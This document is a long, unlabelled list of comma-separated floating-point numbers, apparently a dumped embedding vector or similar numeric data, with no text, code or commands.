-0.03868212178349495, -0.0008620324661023915, -0.021368268877267838, -0.023665770888328552, 0.000591738149523735, -0.030212899670004845, -0.05138595774769783, -0.01689339615404606, 0.004703872371464968, -0.03922270983457565, -0.08132856339216232, -0.014896221458911896, 0.022059021517634392, -0.031774599105119705, 0.0024739440996199846, 0.03865208849310875, -0.05294765532016754, 0.020677516236901283, -0.00936269573867321, 0.04796222969889641, 0.013071734458208084, -0.0037184241227805614, 0.04042401909828186, -0.0233954768627882, -0.02470189891755581, -0.007113996893167496, 0.011810360476374626, 0.017914507538080215, -0.0009985874639824033, -0.024551736190915108, 0.004876560531556606, -0.006164212711155415, 0.0235456395894289, -0.014926253817975521, 0.01720874011516571, -0.01853017881512642, 0.03832172974944115, 0.004137005191296339, -0.016442906111478806, -0.00043406643089838326, 0.0051168217323720455, 0.03588908165693283, 0.02826077491044998, -0.011907966807484627, 0.006772374734282494, 0.03261551633477211, -0.044118043035268784, 0.011712754145264626, -0.02018197625875473, 0.007951158098876476, 0.02491212822496891, 0.016037464141845703, 0.01482113916426897, -0.042976800352334976, -0.016232676804065704, 0.011637672781944275, 0.004159529693424702, -0.048953305929899216, 0.018034638836979866, -0.0069976202212274075, -0.0003948831290472299, -0.010931904427707195, -0.026684056967496872, -0.03787124156951904, -0.026173502206802368, -0.0012041237205266953, -0.017869459465146065, 0.030468178912997246, 0.05952481925487518, 0.03603924438357353, -0.010999477468430996, -0.012125704437494278, 0.00025551262660883367, 0.02184879221022129, 0.006903768051415682, 0.04075437784194946, -0.02659395895898342, -0.005567312706261873, 0.004688855726271868, 0.028816379606723785, 0.0027648857794702053, 0.0034218512009829283, -0.022194167599081993, -0.02491212822496891, 0.008018732070922852, 0.011307313106954098, -0.0154668428003788, 0.011262264102697372, -0.0078160110861063, 0.03736068308353424, 0.004035644698888063, -0.028410937637090683, 0.020632468163967133, -0.024131277576088905, -0.02803552895784378, -0.003277318784967065, -0.046040136367082596, -0.022839872166514397, -0.029176771640777588, 0.011885442771017551, 0.01863529346883297, -0.0019464946817606688, -0.022854886949062347, -0.01394268311560154, -0.004854035563766956, -0.029176771640777588, 0.002706697443500161, -0.005638640373945236, 0.01008348073810339, 0.012005573138594627, -0.019235946238040924, 0.016668150201439857, 0.010368791408836842, -0.030678406357765198, -0.012095671147108078, -0.0069262925535440445, 0.042976800352334976, -0.02007686346769333, 0.02166859619319439, 0.00035734224366024137, -0.005327051039785147, 0.030663391575217247, -0.033276237547397614, -0.03273564577102661, 0.04949389770627022, -0.008123846724629402, -0.01887555420398712, -0.016608085483312607, -0.025167405605316162, 0.002083518775179982, -0.024236392229795456, -0.013762486167252064, -0.012523637153208256, -0.020917778834700584, -0.01699851080775261, 0.04030388966202736, 0.00497416639700532, -0.008844631724059582, -0.03429734706878662, -0.006487064063549042, 0.017884476110339165, -0.0028756314422935247, -0.007688372395932674, 0.009174991399049759, 0.000522756774444133, 0.01329697947949171, -0.001242603175342083, -0.015076417475938797, -0.004899085033684969, 0.0032078681979328394, 0.049043405801057816, -0.01865030825138092, -0.007222865242511034, -0.003564506536349654, 0.008401649072766304, 0.007921125739812851, -0.011562591418623924, -0.03904251381754875, 0.05105559527873993, -0.03715045377612114, 0.019296012818813324, -0.06673266738653183, 0.02329036220908165, 0.0002141003351425752, 0.020737582817673683, -0.003787874709814787, -0.01555694080889225, 0.00589767238125205, -0.008153879083693027, 0.010263676755130291, -0.0007968051941134036, -0.012350949458777905, 0.022119086235761642, -0.012929079122841358, 0.02980745956301689, 0.00852928776293993, 0.014505796134471893, -0.00944528542459011, 0.015992414206266403, 0.02955218032002449, -0.0074593727476894855, -0.004257135558873415, 0.0027048203628510237, 0.010278692469000816, -0.0018592120613902807, -0.023830950260162354, 0.017779361456632614, -0.004985428880900145, -0.014280551113188267, 0.01868034154176712, -0.01320688147097826, -0.010556495748460293, 0.02467186562716961, 0.011404919438064098, 0.006588424555957317, -0.013071734458208084, -0.011389902792870998, 0.044057976454496384, -0.018229851499199867, -0.00332987611182034, 0.01705857552587986, -0.008927221409976482, -0.021158039569854736, -0.013642355799674988, -0.012238326482474804, -0.019280996173620224, -0.011374887079000473, -0.02501724287867546, 0.004422315862029791, -0.016142578795552254, -0.006498326547443867, 0.003343015443533659, -0.02186380885541439, 0.015857268124818802, 0.007662093732506037, 0.028831396251916885, 0.027059465646743774, 0.0006142626516520977, 0.04318702965974808, -0.011232231743633747, -0.028831396251916885, -0.02153344824910164, 0.01881548948585987, -0.0077184047549963, -0.0075307004153728485, -0.022434430196881294, 0.05015461519360542, 0.0029319426976144314, 0.028486019000411034, 0.08271006494760513, -0.02172866091132164, 0.0022956246975809336, 0.014318091794848442, 0.020872728899121284, -0.004463610704988241, 0.016262710094451904, 0.009813185781240463, 0.01555694080889225, -0.014370649121701717, 0.03306600823998451, -0.006197999231517315, 0.011930491775274277, 0.041084740310907364, -0.005507247056812048, -0.015421793796122074, 0.010008398443460464, -0.024041179567575455, -0.034988101571798325, 0.03432738035917282, -0.010090988129377365, -0.02971735969185829, -0.010661609470844269, 0.02459678426384926, 0.06847456842660904, -0.02174367755651474, 0.005293264053761959, -0.026684056967496872, 0.0117653114721179, -0.000610977818723768, -0.011307313106954098, 0.036579832434654236, -0.00926508940756321, 0.023755868896842003, 0.02952214889228344, -0.0008451390312984586, 0.013169340789318085, 0.0051994118839502335, -0.01702854223549366, -0.035078197717666626, 0.013972715474665165, 0.009895776398479939, 0.007861060090363026, -0.033636629581451416, 0.0035851539578288794, 0.031744569540023804, -0.0030445654410868883, -0.013627339154481888, -0.008499255403876305, -0.026804188266396523, 0.016382839530706406, -0.010646593756973743, 0.01466346811503172, -0.0004746575141325593, -0.014685992151498795, -0.00697134155780077, -0.017554115504026413, 0.016127562150359154, 0.0017250034725293517, -0.02776523493230343, 0.016067497432231903, 0.005837606731802225, 0.0009985874639824033, -0.003611432621255517, 0.0038817268796265125, 0.00740681542083621, -0.010661609470844269, 0.01878545619547367, -0.035168297588825226, -0.0032529172021895647, 0.0018479498103260994, 0.019326044246554375, -0.012846489436924458, -0.004459856543689966, -0.005507247056812048, 0.004058169201016426, -0.007695880252867937, -0.02793041430413723, 0.0025602879468351603, 0.027464907616376877, 0.016217660158872604, 0.04009366035461426, -0.0017794377636164427, -0.02624858357012272, 0.016307758167386055, -0.020992860198020935, -0.02609841898083687, -0.011029510758817196, -0.03255544975399971, 0.014933762140572071, 0.013522224500775337, -0.03375675901770592, 0.00503047788515687, 0.03549865633249283, -0.0014556476380676031, -0.02034715749323368, 0.02808057889342308, -0.004084447864443064, -0.024401571601629257, 0.017809392884373665, -0.0076057822443544865, 0.011998064815998077, -0.006415736395865679, -0.011209706775844097, -0.0036752521991729736, -0.007973683066666126, -0.006074114236980677, 0.002657894277945161, 0.008108830079436302, -0.00369026861153543, -0.013739962130784988, -0.008859647437930107, -0.006415736395865679, -0.009114925749599934, 0.020482303574681282, 0.015421793796122074, 0.002627861686050892, 0.0064307525753974915, 0.00021374838252086192, -0.025152388960123062, -0.00846171472221613, 0.01890558749437332, -0.037961337715387344, 0.0014218608848750591, -0.003025794867426157, -0.007448110729455948, 0.019551290199160576, 0.021112991496920586, 0.00043101623305119574, -0.016593068838119507, 0.0044373320415616035, -0.03573891893029213, 0.0031083847861737013, -0.004290922544896603, -0.034657739102840424, 0.0008775180904194713, -0.006734834052622318, -0.016713200137019157, 0.027329761534929276, 0.012275868095457554, 0.012621243484318256, -0.045739807188510895, 0.009723087772727013, 0.012358457781374454, 0.03709039092063904, -0.02190885692834854, 0.0005931459018029273, -0.00213419902138412, 0.014070321805775166, -0.0036940225400030613, 0.011352362111210823, 0.03904251381754875, 0.02183377556502819, -0.026909302920103073, 0.024176327511668205, 0.004820249043405056, 0.02022702619433403, 0.0008319997577928007, -0.012891538441181183, 0.002008437179028988, -0.045589644461870193, -0.013394585810601711, 0.01229088380932808, 0.00010845794895431027, -0.029221821576356888, 0.028636183589696884, 0.004917855374515057, -0.013251930475234985, -0.056911975145339966, 0.02330537885427475, -0.02503225952386856, 0.02659395895898342, -0.021067941561341286, -0.028681231662631035, 0.04240617901086807, 0.01723877154290676, 0.0154368095099926, -0.011555083096027374, -0.010346266441047192, -0.027194613590836525, 0.03703032433986664, -0.004298430867493153, -0.029897557571530342, -0.0154518261551857, 0.03231519088149071, 0.0025715501978993416, -0.02797546423971653, -0.004658823367208242, 0.017989588901400566, -0.007876076735556126, -0.012846489436924458, -0.012621243484318256, -0.017569132149219513, -0.010218627750873566, -0.01690841279923916, -0.013957698829472065, -0.016202643513679504, 0.023966098204255104, -0.00946781039237976, 0.013402094133198261, 0.022509511560201645, 0.015151498839259148, 0.03372672572731972, 0.012959111481904984, -0.0056799352169036865, 0.014896221458911896, -0.019671421498060226, 0.02308013290166855, -0.01877043955028057, 0.03408711776137352, -0.0074706352315843105, -0.019386110827326775, 0.022704724222421646, -0.023966098204255104, -0.003757842117920518, 0.005559804383665323, 0.01465595979243517, 0.019971748813986778, -0.024026162922382355, 0.008476730436086655, -0.023785902187228203, 0.0007442479254677892, -0.029041625559329987, 0.0464605912566185, -0.011922983452677727, 0.005300772376358509, -0.026804188266396523, 0.014475763775408268, -0.06523103266954422, 0.008739517070353031, 0.013281963765621185, -0.01578218676149845, -0.0154368095099926, -0.015496875159442425, -0.013514717109501362, -0.04156526178121567, 0.010571511462330818, 0.0051881494000554085, 0.02937198430299759, 0.008829615078866482, 0.002280608518049121, 0.035108231008052826, -0.0002545740862842649, -0.023035084828734398, 0.0023463049437850714, -0.018229851499199867, 0.0314742736518383, -0.009205023758113384, 0.021398302167654037, 0.001017357804812491, -0.047541771084070206, -0.015286646783351898, 0.008409157395362854, 0.011194690130650997, 0.020962826907634735, -0.044508468359708786, -0.005942721385508776, -0.009632989764213562, 0.015992414206266403, -0.016352808102965355, 0.03570888563990593, -0.01740395277738571, -0.017944540828466415, -0.0026428778655827045, -0.01889057084918022, 0.012426030822098255, -0.010819281451404095, 0.022990034893155098, 0.0024514193646609783, 0.012238326482474804, -0.01570710353553295, -0.001954002771526575, 0.008311551064252853, -0.015219072811305523, 0.015887299552559853, -0.031984828412532806, -0.01842506416141987, 0.011712754145264626, 0.002301255939528346, -0.011074559763073921, -0.033306267112493515, -0.026068387553095818, 0.005465952213853598, 0.02027207426726818, -0.011862917803227901, -0.05793308466672897, -0.022914953529834747, -0.02458176761865616, 0.0022224201820790768, -0.010316234081983566, 0.025377634912729263, 0.0020234533585608006, -0.019521256908774376, -0.02980745956301689, 0.016698183491826057, 0.030137818306684494, -0.006029065232723951, -0.02510734088718891, 0.009587940759956837, -0.01696847751736641, 0.027344776317477226, -0.01687837950885296, -0.013980223797261715, -0.024326490238308907, -0.0022130347788333893, -0.0012444801395758986, 0.0021492154337465763, 0.06979600340127945, -0.01311678346246481, 0.006321884226053953, 0.021428333595395088, 0.044508468359708786, -0.006686030887067318, -0.03603924438357353, -0.005285755731165409, 0.015121466480195522, 0.006344408728182316, 0.02198394015431404, 0.002381968777626753, -0.0062843430787324905, 0.009077385067939758, 0.003573891706764698, -0.0007808502996340394, -0.026819204911589622, -0.01089436374604702, 0.01686336286365986, -0.004812740720808506, -0.03099375031888485, -0.005514755379408598, 0.022329315543174744, 0.015083925798535347, -0.0310838483273983, -0.0016105037648230791, 0.008093813434243202, 0.0030708438716828823, -0.013086751103401184, -0.02027207426726818, 0.001200369675643742, -0.01850014552474022, -0.027314744889736176, -0.008138862438499928, -0.022359348833560944, -0.027134548872709274, 0.019821584224700928, -0.016758248209953308, -0.023996129631996155, -0.045889969915151596, -0.00463629886507988, 0.024026162922382355, -0.0007137460052035749, 0.00855932105332613, -0.006404473911970854, 0.010271185077726841, -0.00019392211106605828, -0.022599609568715096, 0.020902762189507484, -0.01573713682591915, -0.004493643529713154, 0.004170791711658239, -0.03757091239094734, 0.016142578795552254, 0.041264936327934265, 0.00012634851736947894, 0.006100392900407314, 0.00166493805591017, -0.012801440432667732, -0.012365966103971004, -0.001632089726626873, -0.028395920991897583, -0.01723877154290676, 0.04808235913515091, -0.002862492110580206, 0.013184357434511185, -0.0016621224349364638, 0.011847902089357376, 0.019296012818813324, -0.006614703219383955, 0.011990557424724102, 0.011209706775844097, 0.002434526104480028, 0.01313180010765791, -0.052347004413604736, 0.03787124156951904, 0.011329837143421173, 0.0045161680318415165, -0.016097528859972954, -0.003740948624908924, -0.03772107511758804, -0.024461638182401657, -0.02156348153948784, -0.019296012818813324, 0.001845134305767715, 0.0154518261551857, 0.022419413551688194, -0.007222865242511034, 0.013867600820958614, -0.025467732921242714, 0.006333146244287491, -0.009227548725903034, -0.017328869551420212, 0.010406332090497017, -0.004411053378134966, -0.03567885234951973, 0.02971735969185829, 0.014070321805775166, -0.0045011513866484165, 0.019190898165106773, 0.03913261368870735, -0.006967587396502495, -0.015008843503892422, -0.0076095364056527615, -0.002954467199742794, 0.0040318905375897884, 0.02187882550060749, -0.009693055413663387, 0.015249105170369148, 0.028816379606723785, 0.025723010301589966, 0.013244422152638435, 0.01015856210142374, 0.012959111481904984, 0.02324531227350235, -0.009475317783653736, -0.021143022924661636, 0.02006184682250023, -0.02642877958714962, -0.01483615580946207, 0.019401127472519875, 0.025828124955296516, 0.0010060955537483096, -0.0154668428003788, 0.002271223347634077, -0.003431236371397972, 0.0232152808457613, 0.017899490892887115, 0.00926508940756321, -0.008822106756269932, 0.000604877423029393, 0.0027836563531309366, -0.005364591721445322, 0.034717805683612823, -0.014400681480765343, 0.00937020406126976, 0.005969000048935413, -0.009670530445873737, -0.024431604892015457, 0.02040722221136093, 0.002941327868029475, -0.0012247712584212422, -0.038081467151641846, 0.017794376239180565, -0.006505834404379129, -0.008904696442186832, -0.01711864210665226, -0.01331199612468481, 0.010128529742360115, -0.008679451420903206, 0.024191342294216156, -0.012944095768034458, -0.008078797720372677, -0.026744123548269272, -0.027224646881222725, 0.022494494915008545, 0.0005692135891877115, 0.01239599846303463, -0.007943649776279926, 0.00539837870746851, -0.014077830128371716, 0.00019298358529340476, -0.018289916217327118, -0.006738587748259306, 0.02654891088604927, -0.0311138816177845, -0.0037090389523655176, 0.0027423612773418427, -0.02794543094933033, -0.005342067219316959, 0.004189562052488327, -0.025738026946783066, -0.017569132149219513, -0.004223349038511515, -0.0156470388174057, -0.05102556571364403, 0.016698183491826057, 0.0310538150370121, 0.08913706243038177, 0.011254755780100822, -0.02309514954686165, 0.004767691716551781, -0.02968732826411724, -0.015992414206266403, -0.006618456915020943, 0.02803552895784378, 0.009835710749030113, 0.006779883056879044, 0.030182868242263794, -0.014325600117444992, -0.017959557473659515, 0.022569576278328896, 0.007508175913244486, 0.023635737597942352, 0.025843141600489616, 0.008506763726472855, 0.00937020406126976, 0.004914101213216782, 0.0028793856035917997, 0.011832885444164276, 0.00851427111774683, -0.025963272899389267, 0.009220040403306484, -0.02172866091132164, -0.003787874709814787, 0.0019596340134739876, -0.022359348833560944, 0.0002665402425918728, -0.012816456146538258, 0.012043114751577377, -0.013004160486161709, 0.007125258911401033, 0.01874040812253952, 0.02626360021531582, 0.013679896481335163, 0.012823964469134808, -0.008258993737399578, -0.026143468916416168, 0.013349536806344986, -0.00007508176349801943, -0.01689339615404606, -0.009880759753286839, -0.022599609568715096, -0.03375675901770592, 0.016533004119992256, -0.012651276774704456, 0.00851427111774683, -0.0056649185717105865, 0.015797201544046402, -0.00471138022840023, 0.010233643464744091, 0.045709773898124695, -0.020692532882094383, -0.021998954936861992, 0.014888713136315346, -0.013987732119858265, -0.016743231564760208, -0.03543858975172043, 0.008814598433673382, 0.009084893390536308, 0.008356600068509579, 0.014460747130215168, 0.012125704437494278, 0.0020516091026365757, -0.03832172974944115, 0.01572212018072605, -0.011292296461760998, 0.00851427111774683, -0.0034631462767720222, -0.007876076735556126, 0.006888751406222582, 0.0028380905278027058, 0.008334075100719929, 0.010496430099010468, -0.018214834854006767, 0.0010426979279145598, -0.04312696307897568, -0.028636183589696884, 0.020482303574681282, 0.014085338450968266, 0.015256613492965698, 0.0015851636417210102, -0.01845509745180607, 0.008236468769609928, -0.0010595913045108318, 0.02488209493458271, -0.002368829445913434, -0.009985874406993389, -0.00624304823577404, 0.0012285253033041954, 0.017433984205126762, 0.012073147110641003, -0.005863885395228863, 0.017884476110339165, 0.0045124138705432415, -0.010106004774570465, -0.010211119428277016, -0.019145848229527473, 0.0007503483211621642, 0.00018535809067543596, 0.02186380885541439, 0.006513342726975679, -0.0028399676084518433, 0.024281440302729607, 0.014212977141141891, 0.019190898165106773, 0.015962382778525352, -0.020587418228387833, -0.0470312125980854, -0.027314744889736176, -0.002948836190626025, -0.03874218836426735, -0.010601544752717018, -0.02468688227236271, 0.022149119526147842, 0.02812562696635723, 0.00583385257050395, -0.013056717813014984, -0.02962726168334484, 0.0016508601838722825, 0.01006846409291029, -0.03405708447098732, -0.000759733549784869, 0.010849314741790295, -0.013845076784491539, -0.036519769579172134, 0.04219594970345497, 0.030077753588557243, 0.02815566025674343, -0.0076020280830562115, 0.011239739134907722, 0.007042669225484133, 0.036579832434654236, -0.023005051538348198, -0.005886409897357225, 0.011112100444734097, 0.012763898819684982, -0.0021867563482373953, 0.0037127931136637926, 0.02609841898083687, 0.01180285308510065, 0.009903283789753914, 0.032014861702919006, 0.014550845138728619, 0.0063031138852238655, 0.016277724876999855, 0.009610465727746487, 0.019536273553967476, 0.0036170638632029295, -0.02793041430413723, 0.02464183419942856, 0.0310838483273983, 0.0007010759436525404, -0.015204056166112423, 0.024536719545722008, -0.03880225494503975, -0.009077385067939758, 0.02512235753238201, 0.0038047682028263807, 0.03282574564218521, 0.013972715474665165, 0.004208332858979702, -0.013499700464308262, 0.022209184244275093, -0.013484683819115162, -0.007973683066666126, -0.008326566778123379, -0.0028343363665044308, -0.0005898610688745975, 0.03285577893257141, -0.02193889021873474, -0.0020703794434666634, 0.0001473479496780783, 0.025632912293076515, -0.02306511625647545, -0.025452716276049614, 0.005075526889413595, 0.0014584631426259875, -0.008266502059996128, 0.023620720952749252, -0.0233954768627882, -0.00467759370803833, 0.03270561620593071, -0.015061400830745697, 0.03222509101033211, -0.0017250034725293517, -0.03630954027175903, 0.0154368095099926, -0.0021116745192557573, 0.02656392753124237, -0.019025718793272972, -0.021263154223561287, -0.014866188168525696, -0.005068018566817045, -0.011277280747890472, -0.015369236469268799, 0.010346266441047192, -0.013469668105244637, 0.0007451864657923579, 0.01726880483329296, -0.0064420150592923164, -0.007703388575464487, 0.008206436410546303, -0.02790038287639618, 0.006884997244924307, -0.011990557424724102, -0.017719294875860214, 0.0014997581019997597, -0.011832885444164276, 0.006618456915020943, 0.006930046249181032, 0.026834221556782722, 0.022929970175027847, -0.013860092498362064, 0.011224723421037197, -0.04561967775225639, 0.0315043069422245, 0.01692342944443226, -0.017629196867346764, 0.022089052945375443, 0.003472531447187066, 0.001230402383953333, -0.015977399423718452, 0.0005466890870593488, 0.02509232424199581, -0.006535867229104042, -0.020962826907634735, -0.0037390715442597866, -0.0003312982735224068, 0.015286646783351898, 0.01887555420398712, 0.014092846773564816, -0.02506229095160961, 0.0023744606878608465, -0.00028765699244104326, -0.00014547091268468648, 0.02323029562830925, -0.03853195905685425, 0.001523221260868013, -0.0009502535103820264, -0.02638372965157032, 0.01099197007715702, -0.01726880483329296, -0.0002613783872220665, 0.027539988979697227, -0.0015419916016981006, -0.006734834052622318, 0.00471138022840023, -0.016593068838119507, -0.004666331224143505, 0.012914062477648258, 0.003224761690944433, -0.011037019081413746, 0.041264936327934265, 0.027524972334504128, -0.0022036496084183455, -0.0050454940646886826, -0.002481452189385891, 0.01702854223549366, 0.0011468739248812199, -0.018049655482172966, 0.005255723372101784, -0.030107785016298294, 0.02184879221022129, -0.010406332090497017, -0.0035964162088930607, -0.010421348735690117, 0.01311678346246481, -0.0005100867128930986, -0.012816456146538258, -0.0018545194761827588, 0.012628751806914806, 0.003254794282838702, 0.003836677875369787, 0.01008348073810339, -0.00616045854985714, -0.0034669002052396536, 0.005221936386078596, -0.006006540730595589, 0.04315699636936188, -0.01159262377768755, -0.020647484809160233, -0.009152466431260109, 0.00934767909348011, -0.03928277641534805, -0.02013692818582058, -0.014685992151498795, -0.0019464946817606688, -0.007958666421473026, 0.011397411115467548, -0.002732976106926799, -0.026684056967496872, 0.008168895728886127, -0.0029469591099768877, -0.02929690293967724, 0.03775110840797424, -0.015421793796122074, -0.0315043069422245, 0.011682721786201, 0.0036433422937989235, 0.014888713136315346, 0.012118196114897728, 0.003451884025707841, 0.0058150822296738625, 0.00468510203063488, -0.012095671147108078, 0.02311016619205475, -0.024236392229795456, 0.01863529346883297, -0.01740395277738571, -0.014378157444298267, -0.0039605628699064255, 0.0032416549511253834, -0.0007264160085469484, -0.02941703423857689, 0.017719294875860214, 0.002079764846712351, 0.004610020201653242, -0.0016996633494272828, 0.023981114849448204, -0.0034180970396846533, -0.02956719696521759, -0.0051355925388634205, -0.02342550829052925, 0.014408189803361893, 0.011998064815998077, -0.0028643691912293434, -0.021188072860240936, 0.022839872166514397, 0.00740681542083621, 0.033156104385852814, 0.002796795452013612, 0.019746502861380577, -0.005953983403742313, 0.02621855027973652, 0.03609931096434593, -0.008739517070353031, -0.027374809607863426, -0.016172610223293304, 0.02160852961242199, -0.014550845138728619, 0.002363198436796665, 0.019235946238040924, 0.005766279064118862, 0.012891538441181183, 0.02172866091132164, -0.02324531227350235, -0.015076417475938797, -0.02931191958487034, -0.0010652224300429225, -0.008356600068509579, -0.0012623120564967394, 0.014513304457068443, 0.022599609568715096, -0.010744200088083744, -0.005634886212646961, -0.006104147061705589, -0.02151843160390854, -0.01710362546145916, -0.010008398443460464, 0.018334966152906418, 0.0063669332303106785, -0.0032623023726046085, 0.02483704686164856, -0.009678038768470287, -0.0034969330299645662, -0.004857789725065231, -0.007853551767766476, 0.008334075100719929, 0.01554192416369915, -0.0008535857778042555, 0.022059021517634392, 0.014280551113188267, -0.004174545872956514, 0.030378080904483795, -0.007755945902317762, -0.025813108310103416, 0.010654102079570293, 0.011314821429550648, -0.01731385476887226, 0.022194167599081993, -0.02609841898083687, -0.00861938577145338, 0.010826789774000645, -0.014498287811875343, 0.005109313875436783, -0.01095442846417427, -0.007624552585184574, -0.014956286177039146, 0.0014518934767693281, 0.004046906717121601, 0.03694022446870804, 0.022794822230935097, -0.013184357434511185, 0.01884552091360092, 0.006186737213283777, -0.02782529965043068, 0.007519438397139311, 0.026684056967496872, -0.004703872371464968, -0.0075269462540745735, 0.0154368095099926, 0.002502099610865116, 0.019641388207674026, -0.007267914246767759, -0.0034950559493154287, 0.015331695787608624, 0.031984828412532806, 0.02045227214694023, 0.004459856543689966, 0.015196547843515873, 0.007091472391039133, 0.01085682213306427, -0.022884920239448547, -0.019806567579507828, -0.0019765272736549377, -0.0070539312437176704, -0.0004284353053662926, 0.01994171552360058, 0.014107862487435341, -0.0016142578097060323, -0.03937287628650665, 0.022809838876128197, 0.009392728097736835, -0.010826789774000645, -0.022659674286842346, -0.00942276045680046, 0.031864698976278305, 0.016322774812579155, 0.048773109912872314, -0.0038028911221772432, -0.01842506416141987, 0.0016133192693814635, 0.005334558896720409, -0.01723877154290676, 0.0013026685919612646, -0.008994794450700283, -0.02006184682250023, 0.012223310768604279, 0.015249105170369148, -0.015376744791865349, 0.002549025695770979, 0.004061923362314701, 0.0015466843033209443, 0.010924396105110645, 0.017824409529566765, 0.004688855726271868, -0.008807090111076832, 0.02036217413842678, -0.011825377121567726, 0.008694468066096306, 0.00195775693282485, 0.011397411115467548, 0.005957737565040588, 0.003434990532696247, 0.00134771759621799, -0.0015785939758643508, 0.006618456915020943, 0.015279138460755348, -0.03691019490361214, 0.017959557473659515, -0.0019408634398132563, 0.011810360476374626, 0.009993381798267365, -0.005691197235137224, -0.008326566778123379, -0.0044335778802633286, -0.011157149448990822, 0.0010868085082620382, 0.007763453759253025, 0.0020272075198590755, -0.00625806488096714, -0.00620926171541214, 0.0007602028199471533, 0.01241101510822773, -0.01015856210142374, -0.0057550170458853245, -0.005788803566247225, 0.012200785800814629, -0.0050492482259869576, -0.006640981882810593, -0.006821177899837494, -0.008724500425159931, 0.02473193220794201, -0.001519467099569738, 0.007793486583977938, 0.012823964469134808, 0.0045799873769283295, 0.01331950444728136, -0.014708517119288445, -0.01312429178506136, 0.01572212018072605, 0.004775200039148331, 0.015316679142415524, 0.0013073611771687865, 0.015038876794278622, 0.02169862948358059, -0.004527430050075054, -0.006134179886430502, -0.004951641894876957, 0.023035084828734398, 0.013634847477078438, 0.011089575476944447, 0.00017257072613574564, -0.011960524134337902, 0.0069976202212274075, 0.02476196363568306, -0.00861938577145338, 0.025197438895702362, 0.005837606731802225, 0.0036095555406063795, 0.0037691043689846992, 0.016307758167386055, 0.00016095652244985104, -0.017644213512539864, -0.011059543117880821, -0.01893562078475952, -0.0069826035760343075, -0.006498326547443867, 0.012088163755834103, 0.00006786687299609184, -0.025392651557922363, -0.004200824536383152, -0.0008174526738002896, -0.00654712924733758, 0.004839019384235144, -0.0231401976197958, 0.02311016619205475, 0.012531145475804806, -0.002175494097173214, 0.0007081148214638233, -0.022224200889468193, -0.01328947115689516, 0.01482113916426897, 0.03450757637619972, -0.02183377556502819, 0.017689263448119164, -0.014092846773564816, 0.010841806419193745, -0.02623356692492962, 0.012073147110641003, 0.009092400781810284, 0.0011205952614545822, -0.010121021419763565, 0.013492192141711712, -0.02504727430641651, -0.03459767624735832, 0.016352808102965355, 0.00118347629904747, 0.0005344882956705987, -0.014498287811875343, -0.019806567579507828, -0.010466397739946842, 0.017839426174759865, -0.010428856126964092, 0.014062813483178616, -0.006787390913814306, -0.000051501396228559315, -0.01392766647040844, 0.005019215866923332, 0.03543858975172043, 0.022975018247961998, 0.018154770135879517, 0.0063594249077141285, 0.003825415624305606, 0.003005147445946932, -0.004793970379978418, -0.02503225952386856, -0.009400236420333385, -0.016067497432231903, -0.017674246802926064, 0.004474872723221779, 0.004178300034254789, -0.00009660911018727347, -0.004343479871749878, 0.0029037869535386562, 0.022284265607595444, 0.004546200390905142, 0.0026973122730851173, 0.0020234533585608006, -0.016698183491826057, -0.013972715474665165, -0.004039398860186338, -0.005529771558940411, -0.0018657817272469401, -0.016352808102965355, -0.017614180222153664, 0.0007048300467431545, 0.006351917050778866, 0.010669117793440819, -0.01463343482464552, 0.004970412701368332, 0.0074743893928825855, 0.012899046763777733, -0.01707359217107296, 0.003720301203429699, 0.003478162456303835, 0.017719294875860214, -0.008784566074609756, 0.024551736190915108, -0.014505796134471893, -0.01094692014157772, -0.008904696442186832, 0.017734311521053314, 0.009745612740516663, 0.008596861734986305, -0.030257949605584145, -0.021383285522460938, 0.017479034140706062, -0.011247247457504272, -0.00041036875336430967, 0.005657410714775324, -0.0028418446891009808, -0.009520366787910461, 0.007023898418992758, 0.0006494572153314948, 0.0009638621122576296, -0.03676002845168114, 0.0057550170458853245, -0.010421348735690117, -0.003091491525992751, 0.00997836608439684, 0.011022002436220646, 0.008942238055169582, 0.019175881519913673, -0.0011403042590245605, 0.015947366133332253, -0.01578218676149845, -0.002331288531422615, 0.016112545505166054, 0.003605801612138748, -0.0037728585302829742, -0.008581845089793205, 0.01836499758064747, 0.01099197007715702, -0.006167966406792402, -0.0056761810556054115, -0.011022002436220646, -0.00659593241289258, -0.027464907616376877, -0.008912204764783382, -0.001276389928534627, -0.014701008796691895, 0.01230590045452118, 0.005830098874866962, -0.009685547091066837, -0.013739962130784988, 0.0009985874639824033, 0.0023500591050833464, 0.014107862487435341, 0.007181570399552584, 0.02189384028315544, 0.008491747081279755, -0.020752597600221634, 0.002376337768509984, -0.005387116223573685, -0.0028793856035917997, 0.0029563442803919315, 0.0019408634398132563, -0.008108830079436302, -0.008957253769040108, -0.010849314741790295, 0.02306511625647545, -0.003703407710418105, -0.0008704791544005275, 0.014445730485022068, 0.00995584111660719, 0.015391760505735874, -0.007898600772023201, 0.011449968442320824, -0.002770517021417618, 0.01087183877825737, 0.01687837950885296, 0.013169340789318085, -0.02042223885655403, -0.00696383323520422, -0.012598719447851181, 0.016277724876999855, 0.00843918975442648, -0.012966619804501534, 0.004140758886933327, 0.0029469591099768877, 0.006408228073269129, -0.01319186482578516, -0.013424619100987911, -0.011232231743633747, 0.00502296956256032, -0.009723087772727013, -0.00013608568406198174, -0.006115409545600414, 0.012088163755834103, -0.018289916217327118, 0.0039155138656497, -0.02468688227236271, 0.0063594249077141285, 0.009317646734416485, -0.010301217436790466, 0.020887745544314384, -0.005477214232087135, -0.005244460888206959, -0.013792519457638264, 0.010361283086240292, -0.019836600869894028, 0.012959111481904984, -0.0005842299433425069, 0.011840393766760826, -0.007144029252231121, -0.01394268311560154, 0.017554115504026413, 0.008716992102563381, 0.014288058504462242, 0.0005814143805764616, 0.012831472791731358, 0.011457476764917374, -0.010804264806210995, -0.004538692533969879, 0.012906554155051708, -0.01248609647154808, -0.010121021419763565, 0.011750295758247375, 0.008844631724059582, -0.013424619100987911, 0.005709968041628599, 0.0026165994349867105, 0.001485680346377194, -0.004253381863236427, -0.003076475113630295, 0.011074559763073921, 0.013424619100987911, -0.0007555102347396314, 0.04850281774997711, -0.0006930984673090279, -0.000024034961825236678, 0.0004931933362968266, 0.024416588246822357, -0.025677962228655815, 0.005357083398848772, 0.0003076005959883332, 0.02632366493344307, -0.0034256053622812033, 0.008334075100719929, 0.005146854557096958, 0.013604815118014812, 0.01394268311560154, 0.005221936386078596, 0.0033092284575104713, -0.022629642859101295, 0.028786346316337585, -0.008183911442756653, 0.02162354625761509, 0.012110687792301178, 0.008671943098306656, 0.008476730436086655, -0.005724984221160412, -0.006896259728819132, 0.012651276774704456, 0.014115370810031891, 0.002699189353734255, -0.00017151489737443626, 0.008168895728886127, 0.01848512887954712, 